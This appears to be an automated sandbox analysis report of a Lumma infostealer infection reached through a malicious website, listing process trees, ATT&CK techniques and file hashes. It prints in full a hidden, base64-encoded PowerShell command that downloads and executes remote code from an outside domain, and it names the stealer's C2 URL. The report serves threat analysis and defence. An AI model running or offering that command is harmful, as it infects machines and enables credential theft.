lumma | hxxp://karagulismerkezi[.]com

Analysis

max time kernel
145s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
30/01/2025, 14:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://karagulismerkezi.com

Score

10^/10

lumma discovery stealer

Malware Config

Extracted

Family

lumma

https://toppyneedus.biz/api

Signatures

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Blocklisted process makes network request 1 IoCs

flow	pid	Process
64	4932	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2320	II.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\eventvwr.msc	mmc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	II.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
4404	msedge.exe
4404	msedge.exe
2060	msedge.exe
2060	msedge.exe
1072	identity_helper.exe
1072	identity_helper.exe
4932	powershell.exe
4932	powershell.exe
4932	powershell.exe
2320	II.exe
2320	II.exe
696	msedge.exe
696	msedge.exe
696	msedge.exe
696	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4212	mmc.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4932	powershell.exe
Token: SeSecurityPrivilege	4212	mmc.exe
Token: 33	4212	mmc.exe
Token: SeIncBasePriorityPrivilege	4212	mmc.exe
Token: 33	4212	mmc.exe
Token: SeIncBasePriorityPrivilege	4212	mmc.exe
Token: 33	4212	mmc.exe
Token: SeIncBasePriorityPrivilege	4212	mmc.exe
Token: 33	4212	mmc.exe
Token: SeIncBasePriorityPrivilege	4212	mmc.exe
Token: 33	4212	mmc.exe
Token: SeIncBasePriorityPrivilege	4212	mmc.exe
Token: 33	4212	mmc.exe
Token: SeIncBasePriorityPrivilege	4212	mmc.exe
Token: 33	4212	mmc.exe
Token: SeIncBasePriorityPrivilege	4212	mmc.exe
Token: 33	4212	mmc.exe
Token: SeIncBasePriorityPrivilege	4212	mmc.exe
Token: 33	4212	mmc.exe
Token: SeIncBasePriorityPrivilege	4212	mmc.exe
Token: 33	4212	mmc.exe
Token: SeIncBasePriorityPrivilege	4212	mmc.exe
Token: 33	4212	mmc.exe
Token: SeIncBasePriorityPrivilege	4212	mmc.exe
Token: 33	4212	mmc.exe
Token: SeIncBasePriorityPrivilege	4212	mmc.exe
Token: 33	4212	mmc.exe
Token: SeIncBasePriorityPrivilege	4212	mmc.exe
Token: 33	4212	mmc.exe
Token: SeIncBasePriorityPrivilege	4212	mmc.exe
Token: 33	4212	mmc.exe
Token: SeIncBasePriorityPrivilege	4212	mmc.exe
Token: 33	4212	mmc.exe
Token: SeIncBasePriorityPrivilege	4212	mmc.exe
Token: SeSecurityPrivilege	4212	mmc.exe
Token: 33	4212	mmc.exe
Token: SeIncBasePriorityPrivilege	4212	mmc.exe
Token: 33	4212	mmc.exe
Token: SeIncBasePriorityPrivilege	4212	mmc.exe
Token: 33	4212	mmc.exe
Token: SeIncBasePriorityPrivilege	4212	mmc.exe
Token: 33	4212	mmc.exe
Token: SeIncBasePriorityPrivilege	4212	mmc.exe
Token: 33	4212	mmc.exe
Token: SeIncBasePriorityPrivilege	4212	mmc.exe
Token: 33	4212	mmc.exe
Token: SeIncBasePriorityPrivilege	4212	mmc.exe
Token: 33	4212	mmc.exe
Token: SeIncBasePriorityPrivilege	4212	mmc.exe
Token: 33	4212	mmc.exe
Token: SeIncBasePriorityPrivilege	4212	mmc.exe
Token: 33	4212	mmc.exe
Token: SeIncBasePriorityPrivilege	4212	mmc.exe
Token: 33	4212	mmc.exe
Token: SeIncBasePriorityPrivilege	4212	mmc.exe
Token: 33	4212	mmc.exe
Token: SeIncBasePriorityPrivilege	4212	mmc.exe
Token: 33	4212	mmc.exe
Token: SeIncBasePriorityPrivilege	4212	mmc.exe
Token: 33	4212	mmc.exe
Token: SeIncBasePriorityPrivilege	4212	mmc.exe
Token: 33	4212	mmc.exe
Token: SeIncBasePriorityPrivilege	4212	mmc.exe
Token: 33	4212	mmc.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
4212	mmc.exe
4212	mmc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2060 wrote to memory of 5024	2060	msedge.exe	82
PID 2060 wrote to memory of 5024	2060	msedge.exe	82
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4576	2060	msedge.exe	84
PID 2060 wrote to memory of 4404	2060	msedge.exe	85
PID 2060 wrote to memory of 4404	2060	msedge.exe	85
PID 2060 wrote to memory of 2944	2060	msedge.exe	86
PID 2060 wrote to memory of 2944	2060	msedge.exe	86
PID 2060 wrote to memory of 2944	2060	msedge.exe	86
PID 2060 wrote to memory of 2944	2060	msedge.exe	86
PID 2060 wrote to memory of 2944	2060	msedge.exe	86
PID 2060 wrote to memory of 2944	2060	msedge.exe	86
PID 2060 wrote to memory of 2944	2060	msedge.exe	86
PID 2060 wrote to memory of 2944	2060	msedge.exe	86
PID 2060 wrote to memory of 2944	2060	msedge.exe	86
PID 2060 wrote to memory of 2944	2060	msedge.exe	86
PID 2060 wrote to memory of 2944	2060	msedge.exe	86
PID 2060 wrote to memory of 2944	2060	msedge.exe	86
PID 2060 wrote to memory of 2944	2060	msedge.exe	86
PID 2060 wrote to memory of 2944	2060	msedge.exe	86
PID 2060 wrote to memory of 2944	2060	msedge.exe	86
PID 2060 wrote to memory of 2944	2060	msedge.exe	86
PID 2060 wrote to memory of 2944	2060	msedge.exe	86
PID 2060 wrote to memory of 2944	2060	msedge.exe	86
PID 2060 wrote to memory of 2944	2060	msedge.exe	86
PID 2060 wrote to memory of 2944	2060	msedge.exe	86

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://karagulismerkezi.com
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffebd2846f8,0x7ffebd284708,0x7ffebd284718
  2⤵
  PID:5024
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,13944582249989815150,1468311608383382122,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2064 /prefetch:2
  2⤵
  PID:4576
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,13944582249989815150,1468311608383382122,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,13944582249989815150,1468311608383382122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2856 /prefetch:8
  2⤵
  PID:2944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13944582249989815150,1468311608383382122,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
  2⤵
  PID:2824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13944582249989815150,1468311608383382122,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
  2⤵
  PID:1504
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13944582249989815150,1468311608383382122,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5012 /prefetch:1
  2⤵
  PID:2208
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13944582249989815150,1468311608383382122,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5244 /prefetch:1
  2⤵
  PID:2992
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --field-trial-handle=2052,13944582249989815150,1468311608383382122,131072 --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=4196 /prefetch:6
  2⤵
  PID:772
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,13944582249989815150,1468311608383382122,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5572 /prefetch:8
  2⤵
  PID:3616
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,13944582249989815150,1468311608383382122,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5572 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1072
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13944582249989815150,1468311608383382122,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:1
  2⤵
  PID:1496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13944582249989815150,1468311608383382122,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1
  2⤵
  PID:4380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13944582249989815150,1468311608383382122,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:1
  2⤵
  PID:2848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13944582249989815150,1468311608383382122,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:1
  2⤵
  PID:564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13944582249989815150,1468311608383382122,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:1
  2⤵
  PID:2092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,13944582249989815150,1468311608383382122,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6192 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:696

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1488

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3132

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
PID:5100
- C:\Windows\system32\cmd.exe
  cmd /c "powershell -w h -e aQBlAHgAKABpAHcAcgAgAC0AVQByAGkAIAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAGkAbgBnAC4AaQBtAHAAbwByAHQAYQBuAHQALQBjAG8AbgBmAGkAaQByAG0ALgBjAG8AbQAvAGkAbgAuAHAAaABwAD8AYQBjAHQAaQBvAG4APQAxACcAKQA="
  2⤵
  PID:2900
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -w h -e aQBlAHgAKABpAHcAcgAgAC0AVQByAGkAIAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAGkAbgBnAC4AaQBtAHAAbwByAHQAYQBuAHQALQBjAG8AbgBmAGkAaQByAG0ALgBjAG8AbQAvAGkAbgAuAHAAaABwAD8AYQBjAHQAaQBvAG4APQAxACcAKQA=
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4932
  - - C:\Users\Admin\AppData\Local\Temp\II.exe
      "C:\Users\Admin\AppData\Local\Temp\II.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2320

C:\Windows\system32\mmc.exe
"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /s
1⤵
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4212

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
bc29044ff79dd25458f32c381dc676af

SHA1
f4657c0bee9b865607ec3686b8d4f5d4c2c61cd7

SHA256
efe711204437661603d6e59765aba1654678f2093075c1eb2340dc5e80a1140f

SHA512
3d484f755d88c0485195b247230edb79c07cc0941dedbf2f34738ae4f80ba90595f5094c449b213c0c871ade6aff0a14d4acfe843186e2421ccbad221d34bf54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
709e5bc1c62a5aa20abcf92d1a3ae51c

SHA1
71c8b6688cd83f8ba088d3d44d851c19ee9ccff6

SHA256
aa718e97104d2a4c68a9dad4aae806a22060702177f836403094f7ca7f0f8d4e

SHA512
b9fc809fbb95b29336e5102382295d71235b0e3a54828b40380958a7feaf27c6407461765680e1f61d88e2692e912f8ec677a66ff965854bea6afae69d99cf24

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
96B

MD5
cb886554d71d5f4fbe329d8eb1185451

SHA1
2cc164939e136438b38760ca283775c0a0d33fbc

SHA256
b283edb5c929434cf1f1a6f312e2f6d766a49a9a7dbec008e2d297a8bd477af3

SHA512
1ab3b5e7714a6a9855d5e2bf5d8210d73d8e2b3ee90b681e5fa7a87adc6126fead6a8cfcdde5cb29c11275d12dceb5650953171dc113c883ce939cd814082315

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
831B

MD5
13d55f9ef0c2fe74538b229c19069c75

SHA1
3c001c298a4385f25927d27c9693132f725cd790

SHA256
e21fa08c40513b9586af130ba59150c7a4931181f6443fa2bed8033e76dddb6d

SHA512
90294f37402a2e284ba6d824a0c08a3fbb8042e25cd87400c4df8eb30b25846b6f133b55327c6b51ffc922d6c293608a5279ba7f640f5b3be67b0eaab12923f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
9b0d26704b9170f249e28914fbb34c5c

SHA1
83c5becb6137cbd41b3c137fb89eea804b0ba9b5

SHA256
960e49611d5fa6a53baad0321b9873e33d8298eada1feaf9cb211ad889c237f1

SHA512
ffcd1f5471d08624d5f198f522775278893f7a98aab69e4e1759cbd56856366287ee84c75183264b7e2b8453c501b6148eee0a5b07b165b428f96db7d870d098

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
96af169130f0a4e2f78bb28044d1d890

SHA1
8332bd48094f7045f7e9968419a3d80078a9954f

SHA256
b14c8cf63acd8d617c99b6bd89bc771933e85e665c245c73260aa5629846ebc0

SHA512
515231674acfa159f98581a5c7a918ce45401d39de79cf91c74096ee6a28fd74f22bd7806e2b9b216f6b49362ec0f88460f32de0a39eda31a02b8b4a6824f2e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
94bfd6b3604da251249bf4b95470b2a1

SHA1
6b303c6eb43d8380ccfd166482c39ffcb8808b5e

SHA256
f6927577a2bd6678a7c101cbbdaf4ba015bbe0e77c744886f260c5eed669aff6

SHA512
d43e37eced2b846ff2848bd0c97c5f78403d435f473bcc2e9fd86436c72548939e20c38482dce5d175b6aef2fd5ae07b1d201e18e89cffebbfd6b1cdc81eafb5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
f919ea239b77f53dca798d4fa83f9e50

SHA1
0881223af9de0bdc698e377f39f1fa47f08e43e2

SHA256
2cf00a02e6dd2dcbeb55880b9bbee39caf0385617e3b7856d08754e1a78b86af

SHA512
a5dd513e8e073901b7b72f8ea4cd7a3d05528487a64da4534c6126f2dff7193036a54c9f3ff67d95661b43aecb9e389cd8e0adb2b1372eb36981ecf7f2c1f701

Download Submit
C:\Users\Admin\AppData\Local\Temp\II.exe

Filesize
2.0MB

MD5
3e7f9a9bdb7f3da18ed1c7660c93b14c

SHA1
4ef39c36d5860c6b2fc48d277dd4ec1f67495445

SHA256
eb3578267eea5c7f58693c051f4c77277f8b9b000ca3cb1d3bb2993bc66c4ad9

SHA512
75849b6c096b63a38087a1cc32ad242545a8ff29dab2d3ed65000805ae0dbc29f0b109db77334fcef47d652c9fddfcf1748d4b0f12c89a304ae14241baefa9db

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qvanxpeg.mku.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2320-194-0x0000000000960000-0x00000000009BB000-memory.dmp

Filesize
364KB

Download
memory/4212-209-0x000000001FE20000-0x0000000020348000-memory.dmp

Filesize
5.2MB

Download
memory/4932-164-0x000001FA33130000-0x000001FA33152000-memory.dmp

Filesize
136KB

Download
memory/4932-174-0x000001FA4C0A0000-0x000001FA4C846000-memory.dmp

Filesize
7.6MB

Download